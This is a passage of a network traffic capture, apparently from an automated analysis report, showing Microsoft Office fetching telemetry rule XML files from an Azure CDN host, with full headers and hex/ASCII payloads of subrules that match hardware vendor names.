                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            75192.168.2.54980613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                            x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-16547b76f7frbg6bhC1DFWr54000000006mg000000009qst
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            76192.168.2.54980713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                            x-ms-request-id: c70a6fb1-401e-000a-3458-2e4a7b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-17df447cdb5c9wvxhC1DFWn08n000000031g0000000054qk
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            77192.168.2.54980813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:34 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                            x-ms-request-id: 1bd0cbd6-f01e-003c-2a58-2e8cf0000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133934Z-17df447cdb5tcj54hC1DFW3yew00000002zg000000006793
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            78192.168.2.54981713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:34 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                            x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133934Z-16547b76f7f67wxlhC1DFWah9w00000006p000000000bq9h
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            79192.168.2.54981413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:34 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                            x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133934Z-16547b76f7f775p5hC1DFWzdvn00000006k000000000hy8u
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            80192.168.2.54981613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:34 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                            x-ms-request-id: a822020c-901e-005b-1ae1-2e2005000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133934Z-17df447cdb59mt7dhC1DFWqpg400000002vg000000006abr
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:34 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            81192.168.2.54981913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:35 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                            x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133935Z-16547b76f7f9bs6dhC1DFWt3rg00000006r0000000006wku
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            82192.168.2.54982413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:35 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                            x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133935Z-16547b76f7f2g4rlhC1DFWnx8800000006p0000000006hfb
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            83192.168.2.54982313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:35 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                            x-ms-request-id: 07c90e24-501e-007b-7e5c-2e5ba2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133935Z-17df447cdb59mt7dhC1DFWqpg400000002y0000000001h3d
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:35 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
